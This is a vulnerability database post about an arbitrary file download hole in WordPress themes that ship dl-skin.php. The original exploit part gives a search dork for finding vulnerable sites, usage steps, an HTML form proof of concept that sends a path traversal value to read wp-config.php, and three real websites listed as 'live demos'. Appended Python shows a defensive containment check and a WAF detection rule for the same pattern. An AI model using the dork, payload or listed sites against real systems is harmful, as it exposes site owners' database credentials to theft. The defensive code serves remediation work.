WordPress Multi Themes Arbitrary File Download Vulnerability
- Posted in: Vulndb
Published: 2016.08.23
Risk: High
WordPress Multi Themes file download vulnerability
Exploit Title : WordPress Multi Themes Arbitrary File Download Vulnerability
Exploit Author : xBADGIRL21
Dork : wp-content/themes/ /lib/scripts/
Tested on: [ BackBox ]
skype:xbadgirl21
Date: 22/08/2016
Video Proof : https://youtu.be/DFtF14_ShHk
Myblog : http://xbadgirl21.blogspot.com/
# [+] DESCRIPTION :
######################
# [+] WordPress Multi Themes Arbitrary File Download is an exploit that allows attackers to download
# [+] files from your website. The vulnerable file is: dl-skin.php
# [+] So any WordPress theme that ships this file is potentially vulnerable.
USAGE :
- Use the dork above [ok] +
- Download the exploit file and edit it [ok] +
- Edit: http://localhost/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php [ok] +
- Edit: the value you want to download [ok] +
- Run the exploit +
# [+] Exploit:
<html>
<body>
<form action="http://localhost/wp-content/themes/awake/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>
<input type="submit">
</form>
</body>
</html>
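The PoC above works because dl-skin.php opens whatever file name arrives in the _mysite_download_skin parameter, so a value of ../../../../../wp-config.php walks out of the theme directory. The Python below is an added defender-side illustration, not code from the advisory or from any affected theme: safe_skin_path() is the containment check a fixed handler should perform before opening a client-named file, and flag_download_request() is the request-level rule a WAF or reverse proxy could apply to spot this pattern. The advisory does not show dl-skin.php's source, so the skins directory layout, the theme name demo-theme and the sample tree are assumptions constructed for the example.

```python
"""Defender-side checks for the dl-skin.php arbitrary file download described above."""
import os
import tempfile
from urllib.parse import unquote

# Path fragment and parameter name as they appear in the advisory's PoC form.
TARGET_SCRIPT = "/lib/scripts/dl-skin.php"
PARAM = "_mysite_download_skin"


def normalize_param(value: str) -> str:
    """Fully URL-decode the value (so %2e%2e and double-encoded %252e both
    become '..') and treat backslashes as path separators."""
    prev = None
    while prev != value:
        prev = value
        value = unquote(value)
    return value.replace("\\", "/")


def safe_skin_path(skins_dir: str, requested: str):
    """Containment check for a fixed download handler: resolve the client-supplied
    name under skins_dir and refuse anything that does not land strictly inside it.
    realpath() collapses '..' and follows symlinks, so '../../../../../wp-config.php'
    resolves outside the base and is rejected. Returns the absolute path or None."""
    base = os.path.realpath(skins_dir)
    candidate = os.path.realpath(os.path.join(base, normalize_param(requested)))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows: certainly not inside
        return None
    if not inside or candidate == base:
        return None
    return candidate


def flag_download_request(method: str, path: str, form: dict) -> bool:
    """Request-level detection for a WAF or reverse proxy: a POST to dl-skin.php
    whose skin parameter, after decoding, is absolute or contains a '..' segment.
    Deliberately strict: 'a/../b.css' is flagged even though it would resolve inside,
    because a proxy cannot see the filesystem and legitimate skin names need no '..'."""
    if method.upper() != "POST" or not path.endswith(TARGET_SCRIPT):
        return False
    value = form.get(PARAM)
    if value is None:
        return False
    value = normalize_param(value)
    return value.startswith("/") or ".." in value.split("/")


def build_sample_tree():
    """Constructed sample layout (assumed, not from the advisory):
    <root>/wp-config.php and <root>/wp-content/themes/demo-theme/lib/scripts/skins/default.css.
    Returns (skins_dir, wp_config_path)."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    skins = os.path.join(root, "wp-content", "themes", "demo-theme",
                         "lib", "scripts", "skins")
    os.makedirs(skins)
    wp_config = os.path.join(root, "wp-config.php")
    with open(wp_config, "w") as fh:
        fh.write("<?php // constructed placeholder, not a real config\n")
    with open(os.path.join(skins, "default.css"), "w") as fh:
        fh.write("body { }\n")
    return skins, wp_config


if __name__ == "__main__":
    skins_dir, _ = build_sample_tree()
    for name in ("default.css", "../../../../../wp-config.php",
                 "%2e%2e/%2e%2e/wp-config.php"):
        print(f"{name!r:45} -> {safe_skin_path(skins_dir, name)}")
    print(flag_download_request("POST", "/wp-content/themes/awake/lib/scripts/dl-skin.php",
                                {PARAM: "../../../../../wp-config.php"}))  # True
```

The two checks complement each other: the proxy rule catches the request before it reaches PHP but cannot know where the file would resolve, while the realpath containment inside the handler is what actually closes the hole, including for encodings or symlink tricks the proxy rule does not anticipate.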
# [+] Live Demo :
######################
# http://www.bonkersbeat.com/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php
# http://www.aemdum.ca/test/wp-content/themes/method/lib/scripts/dl-skin.php
# http://www.tumct.org/wp-content/themes/awake/lib/scripts/dl-skin.php
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
### Note ### : Themes Vuln
#######################
# Vulnerable themes (not a complete list) : https://ghostbin.com/paste/yg36k